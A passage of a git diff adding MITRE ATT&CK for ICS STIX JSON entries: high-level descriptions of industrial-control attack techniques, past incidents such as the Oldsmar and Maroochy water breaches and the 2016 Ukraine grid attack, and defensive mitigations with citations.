"https://www.wsj.com/articles/iranian-hackers-infiltrated-new-york-dam-in-2013-1450662559" + }, + { + "source_name": "Mark Thompson March 2016", + "description": "Mark Thompson 2016, March 24 Iranian Cyber Attack on New York Dam Shows Future of War Retrieved. 2019/11/07 ", + "url": "https://time.com/4270728/iran-cyber-attack-dam-fbi/" + }, + { + "source_name": "NCCIC January 2014", + "description": "NCCIC 2014, January 1 Internet Accessible Control Systems At Risk Retrieved. 
2019/11/07 ", + "url": "https://www.us-cert.gov/sites/default/files/Monitors/ICS-CERT_Monitor_Jan-April2014.pdf" + }, + { + "source_name": "Stephen Hilt, Federico Maggi, Charles Perine, Lord Remorin, Martin Rsler, and Rainer Vosseler", + "description": "Stephen Hilt, Federico Maggi, Charles Perine, Lord Remorin, Martin Rsler, and Rainer Vosseler Mark Thompson 2016, March 24 Iranian Cyber Attack on New York Dam Shows Future of War Retrieved. 2019/11/07 Caught in the Act: Running a Realistic Factory Honeypot to Capture Real Threats Retrieved. 2021/04/12 ", + "url": "https://documents.trendmicro.com/assets/white_papers/wp-caught-in-the-act-running-a-realistic-factory-honeypot-to-capture-real-threats.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/attack-pattern/attack-pattern--fa3aa267-da22-4bdd-961f-03223322a8d5.json b/cti-ATT-CK-v13.1/ics-attack/attack-pattern/attack-pattern--fa3aa267-da22-4bdd-961f-03223322a8d5.json new file mode 100644 index 0000000000000000000000000000000000000000..dfa90373d98d53bea47209e6bfa0362c065f968e --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/attack-pattern/attack-pattern--fa3aa267-da22-4bdd-961f-03223322a8d5.json 
@@ -0,0 +1,57 @@ +{ + "type": "bundle", + "id": "bundle--63a71c8f-7a45-4400-9ddc-0131361f55d1", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-04-05T14:14:48.109Z", + "name": "Data from Local System", + "description": "Adversaries may target and collect data from local system sources, such as file systems, configuration files, or local databases. This can include sensitive data such as specifications, schematics, or diagrams of control system layouts, devices, and processes.\n\nAdversaries may do this using [Command-Line Interface](https://attack.mitre.org/techniques/T0807) or [Scripting](https://attack.mitre.org/techniques/T0853) techniques to interact with the file system to gather information. Adversaries may also use [Automated Collection](https://attack.mitre.org/techniques/T0802) on the local system. ", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-ics-attack", + "phase_name": "collection" + } + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "", + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_platforms": [ + "Field Controller/RTU/PLC/IED", + "Safety Instrumented System/Protection Relay", + "Control Server", + "Input/Output Server", + "Human-Machine Interface", + "Engineering Workstation" + ], + "x_mitre_version": "1.0", + "x_mitre_data_sources": [ + "Command: Command Execution", + "Process: OS API Execution", + "Process: Process Creation", + "Script: Script Execution", + "File: File Access" + ], + "type": "attack-pattern", + "id": "attack-pattern--fa3aa267-da22-4bdd-961f-03223322a8d5", + "created": "2023-03-30T18:56:02.424Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T0893", + "external_id": "T0893" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + 
"x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/attack-pattern/attack-pattern--fab8fc7d-f27f-4fbb-9de6-44740aade05f.json b/cti-ATT-CK-v13.1/ics-attack/attack-pattern/attack-pattern--fab8fc7d-f27f-4fbb-9de6-44740aade05f.json new file mode 100644 index 0000000000000000000000000000000000000000..46034449ed3d3739e4089832290c8232c7d6223d --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/attack-pattern/attack-pattern--fab8fc7d-f27f-4fbb-9de6-44740aade05f.json 
@@ -0,0 +1,57 @@ +{ + "type": "bundle", + "id": "bundle--b2051dfe-26a2-4050-bd67-7aacf6fc8467", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-04-07T13:40:53.842Z", + "name": "Change Credential", + "description": "Adversaries may modify software and device credentials to prevent operator and responder access. Depending on the device, the modification or addition of this password could prevent any device configuration actions from being accomplished and may require a factory reset or replacement of hardware. These credentials are often built-in features provided by the device vendors as a means to restrict access to management interfaces.\n\nAn adversary with access to valid or hardcoded credentials could change the credential to prevent future authorized device access. Change Credential may be especially damaging when paired with other techniques such as Modify Program, Data Destruction, or Modify Controller Tasking. In these cases, a device\u2019s configuration may be destroyed or include malicious actions for the process environment, which cannot not be removed through normal device configuration actions. \n\nAdditionally, recovery of the device and original configuration may be difficult depending on the features provided by the device. In some cases, these passwords cannot be removed onsite and may require that the device be sent back to the vendor for additional recovery steps.\n\n\nA chain of incidents occurred in Germany, where adversaries locked operators out of their building automation system (BAS) controllers by enabling a previously unset BCU key. 
(Citation: German BAS Lockout Dec 2021) \n", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-ics-attack", + "phase_name": "inhibit-response-function" + } + ], + "x_mitre_contributors": [ + "Felix Eberstaller" + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "", + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_platforms": [ + "Field Controller/RTU/PLC/IED" + ], + "x_mitre_version": "1.0", + "x_mitre_data_sources": [ + "Network Traffic: Network Traffic Content", + "Operational Databases: Device Alarm" + ], + "type": "attack-pattern", + "id": "attack-pattern--fab8fc7d-f27f-4fbb-9de6-44740aade05f", + "created": "2023-03-30T14:04:17.023Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T0892", + "external_id": "T0892" + }, + { + "source_name": "German BAS Lockout Dec 2021", + "description": "Kelly Jackson Higgins. (2021, December 20). Lights Out: Cyberattacks Shut Down Building Automation Systems. Retrieved March 30, 2023.", + "url": "https://www.darkreading.com/attacks-breaches/lights-out-cyberattacks-shut-down-building-automation-systems" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/attack-pattern/attack-pattern--fc5fda7e-6b2c-4457-b036-759896a2efa2.json b/cti-ATT-CK-v13.1/ics-attack/attack-pattern/attack-pattern--fc5fda7e-6b2c-4457-b036-759896a2efa2.json new file mode 100644 index 0000000000000000000000000000000000000000..8a9c0184d66f123e84b1e6efaeb0bba8049ee899 --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/attack-pattern/attack-pattern--fc5fda7e-6b2c-4457-b036-759896a2efa2.json 
@@ -0,0 +1,56 @@ +{ + "type": "bundle", + "id": "bundle--01b173fc-5561-440a-8380-62198c50ba45", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-03-09T18:38:51.471Z", + "name": "Modify Program", + "description": "Adversaries may modify or add a program on a controller to affect how it interacts with the physical process, peripheral devices and other hosts on the network. Modification to controller programs can be accomplished using a Program Download in addition to other types of program modification such as online edit and program append. \n\nProgram modification encompasses the addition and modification of instructions and logic contained in Program Organization Units (POU) (Citation: IEC February 2013) and similar programming elements found on controllers. This can include, for example, adding new functions to a controller, modifying the logic in existing functions and making new calls from one function to another. \n\nSome programs may allow an adversary to interact directly with the native API of the controller to take advantage of obscure features or vulnerabilities.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-ics-attack", + "phase_name": "persistence" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_deprecated": false, + "x_mitre_detection": "", + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Field Controller/RTU/PLC/IED" + ], + "x_mitre_version": "1.1", + "x_mitre_data_sources": [ + "Operational Databases: Device Alarm", + "Asset: Software", + "Application Log: Application Log Content", + "Network Traffic: Network Traffic Content" + ], + "type": "attack-pattern", + "id": "attack-pattern--fc5fda7e-6b2c-4457-b036-759896a2efa2", + "created": "2021-04-13T11:15:26.506Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": 
[ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T0889", + "external_id": "T0889" + }, + { + "source_name": "IEC February 2013", + "description": "IEC 2013, February 20 IEC 61131-3:2013 Programmable controllers - Part 3: Programming languages Retrieved. 2019/10/22 ", + "url": "https://webstore.iec.ch/publication/4552" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/campaign/campaign--65281d3e-b03c-46b8-8cd8-716363ac3cb2.json b/cti-ATT-CK-v13.1/ics-attack/campaign/campaign--65281d3e-b03c-46b8-8cd8-716363ac3cb2.json new file mode 100644 index 0000000000000000000000000000000000000000..0a34459a61c15410e5b8e5d7b6de3bd568e3fd0f --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/campaign/campaign--65281d3e-b03c-46b8-8cd8-716363ac3cb2.json 
@@ -0,0 +1,56 @@ +{ + "type": "bundle", + "id": "bundle--56950f2b-d5bb-4ae1-ad11-c4c4c4e088b1", + "spec_version": "2.0", + "objects": [ + { + "modified": "2022-10-21T15:56:01.070Z", + "name": "Oldsmar Treatment Plant Intrusion", + "description": "[Oldsmar Treatment Plant Intrusion](https://attack.mitre.org/campaigns/C0009) was a cyber incident involving a water treatment facility in Florida. During this incident, unidentified threat actors leveraged features of the system to access and modify setpoints for a specific chemical required in the treatment process. The incident was detected immediately and prevented before it could cause any harm to the public.(Citation: Pinellas County Sheriffs Office February 2021)(Citation: CISA AA21-042A Water Treatment Intrusion Feb 2021)(Citation: Dragos Oldsmar Feb 2021)", + "aliases": [ + "Oldsmar Treatment Plant Intrusion" + ], + "first_seen": "2021-02-01T05:00:00.000Z", + "last_seen": "2021-02-01T05:00:00.000Z", + "x_mitre_first_seen_citation": "(Citation: Pinellas County Sheriffs Office February 2021)", + "x_mitre_last_seen_citation": "(Citation: Pinellas County Sheriffs Office February 2021)", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "type": "campaign", + "id": "campaign--65281d3e-b03c-46b8-8cd8-716363ac3cb2", + "created": "2022-09-20T20:53:14.373Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/campaigns/C0009", + "external_id": "C0009" + }, + { + "source_name": "CISA AA21-042A Water Treatment Intrusion Feb 2021", + "description": "CISA. (2021, February 11). Compromise of U.S. Water Treatment Facility . 
Retrieved October 18, 2022.", + "url": "https://www.cisa.gov/uscert/ncas/alerts/aa21-042a" + }, + { + "source_name": "Pinellas County Sheriffs Office February 2021", + "description": "Pinellas County Sheriffs Office 2021, February 8 Treatment Plant Intrusion Press Conference Retrieved. 2021/10/08 ", + "url": "https://www.youtube.com/watch?v=MkXDSOgLQ6M" + }, + { + "source_name": "Dragos Oldsmar Feb 2021", + "description": "Serino, G., et al . (2021, February 8). Recommendations Following the Oldsmar Water Treatment Facility Cyber Attack. Retrieved October 21, 2022.", + "url": "https://www.dragos.com/blog/industry-news/recommendations-following-the-oldsmar-water-treatment-facility-cyber-attack/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.0.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_domains": [ + "ics-attack" + ] + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/campaign/campaign--70cab19e-1745-425e-b3db-c02cd5ff157a.json b/cti-ATT-CK-v13.1/ics-attack/campaign/campaign--70cab19e-1745-425e-b3db-c02cd5ff157a.json new file mode 100644 index 0000000000000000000000000000000000000000..05aebc30f4fb402e458c0e7de3eb098ed6092837 --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/campaign/campaign--70cab19e-1745-425e-b3db-c02cd5ff157a.json 
@@ -0,0 +1,46 @@ +{ + "type": "bundle", + "id": "bundle--b27263c2-2c44-42e0-a121-3727560f9b61", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-04-05T22:00:43.353Z", + "name": "Maroochy Water Breach", + "description": "[Maroochy Water Breach](https://attack.mitre.org/campaigns/C0020) was an incident in 2000 where an adversary leveraged the local government\u2019s wastewater control system and stolen engineering equipment to disrupt and eventually release 800,000 liters of raw sewage into the local community.(Citation: Marshall Abrams July 2008)", + "aliases": [ + "Maroochy Water Breach" + ], + "first_seen": "2000-02-01T05:00:00.000Z", + "last_seen": "2000-04-01T05:00:00.000Z", + "x_mitre_first_seen_citation": "(Citation: Marshall Abrams July 2008)", + "x_mitre_last_seen_citation": "(Citation: Marshall Abrams July 2008)", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "type": "campaign", + "id": "campaign--70cab19e-1745-425e-b3db-c02cd5ff157a", + "created": "2023-03-10T20:01:08.133Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/campaigns/C0020", + "external_id": "C0020" + }, + { + "source_name": "Marshall Abrams July 2008", + "description": "Marshall Abrams 2008, July 23 Malicious Control System Cyber Security Attack Case Study Maroochy Water Services, Australia Retrieved. 2018/03/27 ", + "url": "https://www.mitre.org/sites/default/files/pdf/08_1145.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_domains": [ + "ics-attack" + ] + } + ] +} \ No newline at end of file 
diff --git a/cti-ATT-CK-v13.1/ics-attack/campaign/campaign--aa73efef-1418-4dbe-b43c-87a498e97234.json b/cti-ATT-CK-v13.1/ics-attack/campaign/campaign--aa73efef-1418-4dbe-b43c-87a498e97234.json new file mode 100644 index 0000000000000000000000000000000000000000..12cb015b7ef8055e47fbe397132a24d9ef21014f --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/campaign/campaign--aa73efef-1418-4dbe-b43c-87a498e97234.json 
@@ -0,0 +1,52 @@ +{ + "type": "bundle", + "id": "bundle--c8026253-06b2-44ac-98a3-163ddc80355c", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-04-10T21:18:24.743Z", + "name": "2016 Ukraine Electric Power Attack", + "description": "[2016 Ukraine Electric Power Attack](https://attack.mitre.org/campaigns/C0025) was a [Sandworm Team](https://attack.mitre.org/groups/G0034) campaign during which they used [Industroyer](https://attack.mitre.org/software/S0604) malware to target and disrupt distribution substations within the Ukrainian power grid. This campaign was the second major public attack conducted against Ukraine by [Sandworm Team](https://attack.mitre.org/groups/G0034).(Citation: ESET Industroyer)(Citation: Dragos Crashoverride 2018)", + "aliases": [ + "2016 Ukraine Electric Power Attack" + ], + "first_seen": "2016-12-01T05:00:00.000Z", + "last_seen": "2016-12-01T05:00:00.000Z", + "x_mitre_first_seen_citation": "(Citation: ESET Industroyer)(Citation: Dragos Crashoverride 2018)", + "x_mitre_last_seen_citation": "(Citation: ESET Industroyer)(Citation: Dragos Crashoverride 2018)", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "type": "campaign", + "id": "campaign--aa73efef-1418-4dbe-b43c-87a498e97234", + "created": "2023-03-31T17:22:23.567Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/campaigns/C0025", + "external_id": "C0025" + }, + { + "source_name": "ESET Industroyer", + "description": "Anton Cherepanov. (2017, June 12). Win32/Industroyer: A new threat for industrial controls systems. Retrieved December 18, 2020.", + "url": "https://www.welivesecurity.com/wp-content/uploads/2017/06/Win32_Industroyer.pdf" + }, + { + "source_name": "Dragos Crashoverride 2018", + "description": "Joe Slowik. (2018, October 12). Anatomy of an Attack: Detecting and Defeating CRASHOVERRIDE. 
Retrieved December 18, 2020.", + "url": "https://www.dragos.com/wp-content/uploads/CRASHOVERRIDE2018.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_domains": [ + "enterprise-attack", + "ics-attack" + ] + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/course-of-action/course-of-action--059ba11e-e3dc-49aa-84ca-88197f40d4ea.json b/cti-ATT-CK-v13.1/ics-attack/course-of-action/course-of-action--059ba11e-e3dc-49aa-84ca-88197f40d4ea.json new file mode 100644 index 0000000000000000000000000000000000000000..4a8f16c369a3bcdf287e5ad4961d4651503da5ab --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/course-of-action/course-of-action--059ba11e-e3dc-49aa-84ca-88197f40d4ea.json 
@@ -0,0 +1,37 @@ +{ + "type": "bundle", + "id": "bundle--8178d68a-f9a5-417a-b181-6ececab1515e", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-03-30T20:55:21.006Z", + "name": "Application Isolation and Sandboxing", + "description": "Restrict the execution of code to a virtual environment on or in-transit to an endpoint system.", + "labels": [ + "IEC 62443-3-3:2013 - SR 5.4", + "IEC 62443-4-2:2019 - CR 5.4", + "NIST SP 800-53 Rev. 4 - SI-3" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "type": "course-of-action", + "id": "course-of-action--059ba11e-e3dc-49aa-84ca-88197f40d4ea", + "created": "2019-06-11T17:06:56.230Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/mitigations/M0948", + "external_id": "M0948" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/course-of-action/course-of-action--11f242bc-3121-438c-84b2-5cbd46a4bb17.json b/cti-ATT-CK-v13.1/ics-attack/course-of-action/course-of-action--11f242bc-3121-438c-84b2-5cbd46a4bb17.json new file mode 100644 index 0000000000000000000000000000000000000000..13d7bc925bb0167521079e010a42a9eaf03b57a6 --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/course-of-action/course-of-action--11f242bc-3121-438c-84b2-5cbd46a4bb17.json 
@@ -0,0 +1,42 @@ +{ + "type": "bundle", + "id": "bundle--3007ab4e-b24a-4606-bf51-0407af48b424", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-03-30T20:55:19.604Z", + "name": "Filter Network Traffic", + "description": "Use network appliances to filter ingress or egress traffic and perform protocol-based filtering. Configure software on endpoints to filter network traffic. Perform inline allow/denylisting of network messages based on the application layer (OSI Layer 7) protocol, especially for automation protocols. Application allowlists are beneficial when there are well-defined communication sequences, types, rates, or patterns needed during expected system operations. Application denylists may be needed if all acceptable communication sequences cannot be defined, but instead a set of known malicious uses can be denied (e.g., excessive communication attempts, shutdown messages, invalid commands). Devices performing these functions are often referred to as deep-packet inspection (DPI) firewalls, context-aware firewalls, or firewalls blocking specific automation/SCADA protocol aware firewalls. (Citation: Centre for the Protection of National Infrastructure February 2005)", + "labels": [ + "IEC 62443-3-3:2013 - SR 5.1", + "IEC 62443-4-2:2019 - CR 5.1", + "NIST SP 800-53 Rev. 
4 - AC-3; SC-7" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "type": "course-of-action", + "id": "course-of-action--11f242bc-3121-438c-84b2-5cbd46a4bb17", + "created": "2019-06-11T16:33:55.337Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/mitigations/M0937", + "external_id": "M0937" + }, + { + "source_name": "Centre for the Protection of National Infrastructure February 2005", + "description": "Centre for the Protection of National Infrastructure 2005, February FIREWALL DEPLOYMENT FOR SCADA AND PROCESS CONTROL NETWORKS Retrieved. 2020/09/17 ", + "url": "https://www.energy.gov/sites/prod/files/Good%20Practices%20Guide%20for%20Firewall%20Deployment.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/course-of-action/course-of-action--143b4398-3222-480a-b6a4-e131bc2d3144.json b/cti-ATT-CK-v13.1/ics-attack/course-of-action/course-of-action--143b4398-3222-480a-b6a4-e131bc2d3144.json new file mode 100644 index 0000000000000000000000000000000000000000..dd95661fd34924697a154d42814fa40e8f71610f --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/course-of-action/course-of-action--143b4398-3222-480a-b6a4-e131bc2d3144.json 
@@ -0,0 +1,37 @@ +{ + "type": "bundle", + "id": "bundle--7f17af24-33aa-4219-95da-df7069ea1bd3", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-03-30T20:55:17.426Z", + "name": "Restrict Web-Based Content", + "description": "Restrict use of certain websites, block downloads/attachments, block Javascript, restrict browser extensions, etc.", + "labels": [ + "IEC 62443-3-3:2013 - SR 2.4", + "IEC 62443-4-2:2019 - HDR 2.4", + "NIST SP 800-53 Rev. 4 - SC-18" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "type": "course-of-action", + "id": "course-of-action--143b4398-3222-480a-b6a4-e131bc2d3144", + "created": "2019-06-06T20:52:59.206Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/mitigations/M0921", + "external_id": "M0921" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/course-of-action/course-of-action--1cbcceef-3233-4062-aa86-ec91afe39517.json b/cti-ATT-CK-v13.1/ics-attack/course-of-action/course-of-action--1cbcceef-3233-4062-aa86-ec91afe39517.json new file mode 100644 index 0000000000000000000000000000000000000000..8f5378b18f20f5c9704c473dd2eb5f306f66b0a8 --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/course-of-action/course-of-action--1cbcceef-3233-4062-aa86-ec91afe39517.json 
@@ -0,0 +1,46 @@ +{ + "type": "bundle", + "id": "bundle--12cb1484-5fe8-4049-b294-7848cdd11c27", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-03-31T19:16:54.636Z", + "name": "Validate Program Inputs", + "description": "Devices and programs designed to interact with control system parameters should validate the format and content of all user inputs and actions to ensure the values are within intended operational ranges. These values should be evaluated and further enforced through the program logic running on the field controller. If a problematic or invalid input is identified, the programs should either utilize a predetermined safe value or enter a known safe state, while also logging or alerting on the event.(Citation: PLCTop20 Mar 2023)", + "labels": [ + "NIST SP 800-53 Rev. 4 - SI-10", + "IEC 62443-3-3:2013 - SR 3.5", + "IEC 62443-3-3:2013 - SR 3.6", + "IEC 62443-4-2:2019 - CR 3.5", + "IEC 62443-4-2:2019 - CR 3.6" + ], + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_version": "1.0", + "type": "course-of-action", + "id": "course-of-action--1cbcceef-3233-4062-aa86-ec91afe39517", + "created": "2023-03-22T15:49:55.439Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/mitigations/M0818", + "external_id": "M0818" + }, + { + "source_name": "PLCTop20 Mar 2023", + "description": "PLC Security, Top 20 Community. (2021, June 15). Secure PLC Coding Practices: Top 20 version 1.0. Retrieved March 22, 2023.", + "url": "https://plc-security.com/content/Top_20_Secure_PLC_Coding_Practices_V1.0.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file 
diff --git a/cti-ATT-CK-v13.1/ics-attack/course-of-action/course-of-action--1e7ccfc0-94c8-496e-8d27-032120892291.json b/cti-ATT-CK-v13.1/ics-attack/course-of-action/course-of-action--1e7ccfc0-94c8-496e-8d27-032120892291.json new file mode 100644 index 0000000000000000000000000000000000000000..ab38dfc9847ad6d0c9c00d9380d95c8b2d3ecae9 --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/course-of-action/course-of-action--1e7ccfc0-94c8-496e-8d27-032120892291.json 
@@ -0,0 +1,47 @@ +{ + "type": "bundle", + "id": "bundle--eecccda2-5dcf-4ef2-b90c-f06b677e531c", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-03-30T20:55:18.480Z", + "name": "Network Segmentation", + "description": "Architect sections of the network to isolate critical systems, functions, or resources. Use physical and logical segmentation to prevent access to potentially sensitive systems and information. Use a DMZ to contain any internet-facing services that should not be exposed from the internal network. Restrict network access to only required systems and services. In addition, prevent systems from other networks or business functions (e.g., enterprise) from accessing critical process control systems. For example, in IEC 62443, systems within the same secure level should be grouped into a zone, and access to that zone is restricted by a conduit, or mechanism to restrict data flows between zones by segmenting the network. (Citation: IEC February 2019) (Citation: IEC August 2013)", + "labels": [ + "IEC 62443-3-3:2013 - SR 5.1", + "IEC 62443-4-2:2019 - CR 5.1", + "NIST SP 800-53 Rev. 4 - AC-3" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "type": "course-of-action", + "id": "course-of-action--1e7ccfc0-94c8-496e-8d27-032120892291", + "created": "2019-06-10T20:41:03.271Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/mitigations/M0930", + "external_id": "M0930" + }, + { + "source_name": "IEC February 2019", + "description": "IEC 2019, February Security for industrial automation and control systems - Part 4-2: Technical security requirements for IACS components Retrieved. 
2020/09/25 ", + "url": "https://webstore.iec.ch/publication/34421" + }, + { + "source_name": "IEC August 2013", + "description": "IEC 2013, August Industrial communication networks - Network and system security - Part 3-3: System security requirements and security levels Retrieved. 2020/09/25 ", + "url": "https://webstore.iec.ch/publication/7033" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/course-of-action/course-of-action--2ab9fc6d-3cf6-4d7b-85f1-3ad6949233b3.json b/cti-ATT-CK-v13.1/ics-attack/course-of-action/course-of-action--2ab9fc6d-3cf6-4d7b-85f1-3ad6949233b3.json new file mode 100644 index 0000000000000000000000000000000000000000..2e3f8f4597fd50f78a34977f2323c3544a20bb2c --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/course-of-action/course-of-action--2ab9fc6d-3cf6-4d7b-85f1-3ad6949233b3.json 
@@ -0,0 +1,39 @@ +{ + "type": "bundle", + "id": "bundle--8c774de0-ddbb-4fd0-ae0b-537a795797ce", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-04-11T20:51:32.610Z", + "name": "Restrict Library Loading", + "description": "Prevent abuse of library loading mechanisms in the operating system and software to load untrusted code by configuring appropriate library loading mechanisms and investigating potential vulnerable software.", + "labels": [ + "IEC 62443-3-3:2013 - SR 7.7", + "IEC 62443-4-2:2019 - CR 7.7", + "NIST SP 800-53 Rev. 4 - CM-7" + ], + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_version": "1.0", + "type": "course-of-action", + "id": "course-of-action--2ab9fc6d-3cf6-4d7b-85f1-3ad6949233b3", + "created": "2019-06-11T17:00:01.740Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/mitigations/M0944", + 